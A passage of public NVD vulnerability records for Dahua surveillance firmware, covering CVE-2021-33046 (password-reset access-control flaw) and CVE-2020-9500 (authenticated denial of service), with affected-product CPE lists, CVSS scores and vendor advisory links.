                     matchCriteriaId: "EC6412DA-4BC4-4326-91DF-7F26572CEFA4",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "73B58CBF-EB67-4F02-BBAE-FFC329B8873C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A7D5E183-2F9C-4B81-AC1E-B7C3420594C2",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2E314BF6-76B4-4ADB-B555-7DAF92F60485",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0D95CC99-5249-4F67-B318-11F68CD42BBA",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F7EA0704-EC7A-457A-9AC1-A39B07229DFE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-pt8x21x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A231CFA-4CBB-4B0B-AC9D-3BAAA1B0A78B",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-pt8x21x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "296AE38D-36C0-430F-BFB2-9FB2B5087C83",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "63FB807B-14F6-4D09-BF06-039BDD7C6F19",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D166CD0E-92CC-44FA-A520-FFFEBE2D7D50",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A29734EC-0A1D-40F4-9A77-59D64A552975",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75A88A53-91D8-4019-95EB-F6FEFF469F9A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:nvr1xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA1B61BC-4D6E-4AFA-8F43-CEB88E8084FB",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:nvr1xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7E209BDB-4D44-4ABB-A5EC-0EC46C6EFE48",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:nvr2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "84EA30CA-F1CD-4FC6-A2DC-5DED62E85583",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:nvr2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6B0F1A0B-4C7A-4763-BACC-A4D277F7DA6A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:nvr4xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E87CB4D6-9237-4D20-B494-DEABA7836BC6",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:nvr4xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "994D8768-F93B-4AE0-A2DD-11A24C14882E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:nvr5xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "C19D24F8-1FF6-4B80-B9A6-6C6E0174EC71",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:nvr5xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA773F1A-D8CB-4B86-AEF6-7EBFC8A638B8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:xvr4xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E215F5B8-A229-4EC1-B029-05DE9B14CA55",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:xvr4xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21BCC22E-3CBD-48E9-A92F-B1478B12D047",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:xvr5xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E3564DD5-7C1B-4DF2-BB44-B9A58BBA7E4A",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:xvr5xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "84B3EDC6-6D9F-4B3D-A155-CD82D330CC3F",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:xvr7xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CFE5E8C5-A7D2-4962-BBB0-8507F41B35B8",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:xvr7xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "036DF596-F7AE-48FC-A862-2F5267B4B5C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:hcvr7xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F49454AC-EB35-41A5-9CC8-3116C02B447E",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:hcvr7xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF15D7BC-70E1-43E3-B54E-9848F67E9AE2",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:hcvr8xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E9EFA83B-4DC1-4936-BDCA-0A3846201F6F",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:hcvr8xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E7DF9BAE-3446-438B-BD14-0E450815CFEF",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:vtox20xf_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ADE8A4D8-1D43-4241-B723-FAD1A8804688",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:vtox20xf:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A17A30F-F376-4438-A331-372DC1AA4073",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:asc2204c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "8EEB9746-4F02-4125-9022-C7D995B8C1B5",
                     versionEndIncluding: "2021-7",
                     versionStartIncluding: "2017-7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:asc2204c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "421A373F-AC77-4CAF-BE0F-D53F4E29D520",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.",
      },
      {
         lang: "es",
         value: "Algunos productos Dahua presentan una vulnerabilidad de control de acceso en el proceso de restablecimiento de la contraseña. Los atacantes pueden explotar esta vulnerabilidad mediante implementaciones específicas para restablecer las contraseñas de los dispositivos",
      },
   ],
   id: "CVE-2021-33046",
   lastModified: "2024-11-21T06:08:11.233",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 7.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-01-13T21:15:07.753",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
      },
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Not Applicable",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
      },
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Not Applicable",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-287",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2020-04-09 14:15
Modified
2024-11-21 05:40
Summary
Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1CE773D-CA5F-483C-B20C-DAD30A590DDD",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "083AE420-CAF9-4A2A-8C76-79DD590FA191",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1EE24474-EF35-4475-99DD-4B54D6AF0B2D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A075994-60D1-40B7-9EF6-8048CBC18764",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A3C5893-E1D0-4E06-9F7F-058B657E4493",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F78D2E9E-9909-4130-A146-CA861F7DF341",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "19B57B9D-0729-48E0-892B-E39AE1F89AB4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "18CD222C-C95A-4D5E-A763-5D2F74EAEC04",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ECBC0BF-171E-49FD-B6AF-CC7B29D39FB7",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9E8CB654-0526-4E7A-8984-8350B39BB4DF",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "724F4B7D-C8C1-4914-B1D6-B4CB9B1F4093",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3AEBFC1D-9F25-4FDB-A191-D7D6C1C6E234",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D6E27D8-C608-49E7-8284-5196EDB428DB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A046C7EA-F954-4F36-9ED3-DBA84F1FB2D3",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B8887C8-C335-4EBB-BC7F-D4F8D8205DAE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCD8DCD2-5CEA-420F-860C-11B469D9FF8F",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F051A1A0-E841-42E7-92A3-E45E4017DCDE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F092AA97-7184-4499-BB83-D6204BD4621B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "FCB3A7FD-63A2-423C-912F-E2E5B4690CF1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "855B3C5F-CE9D-4FFA-B485-11A8D675F006",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "83B0FAFA-BEF4-4196-A4BC-4CFD6DCF4986",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D0E03DE-1BFA-43AD-9AC6-72A1A1545D4B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B51E9FED-4929-42CC-AA6F-BFF61E8F88C0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F20B6467-53DC-4DC6-BCC2-6B6B33ABD65D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB41CE1D-1A97-4549-A849-D06F78858CA3",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BFA91720-5AE4-48B6-A940-A4DBE650591D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D871578A-E282-4AEE-8B7E-5F52011FA9CA",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ACD4FD87-1D74-4895-AA89-D26541A55433",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7936F0A3-F6DF-47B2-898E-DBE68B369633",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D5136C6-2355-4782-BF9C-0874DC5B0CDA",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "195D7533-B2EF-4BC2-B6D6-0B141FB90090",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7180D6E1-6F7F-4EAD-BD51-02C029EFB034",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03D1AD58-447D-4D30-B9CF-48B5CB743C2B",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "AEC0287A-824B-46D0-84AB-54BEEF90E16B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5667962D-1A47-4D77-95A4-6B34F8863761",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.",
      },
      {
         lang: "es",
         value: "Algunos productos de Dahua presentan vulnerabilidades de denegación de servicio. Después del inicio de sesión con éxito de la cuenta legal, el atacante envía un comando de consulta de registro específico, lo que puede causar que el dispositivo se caiga.",
      },
   ],
   id: "CVE-2020-9500",
   lastModified: "2024-11-21T05:40:46.927",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "PARTIAL",
               baseScore: 4,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:S/C:N/I:N/A:P",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 4.9,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "HIGH",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 1.2,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
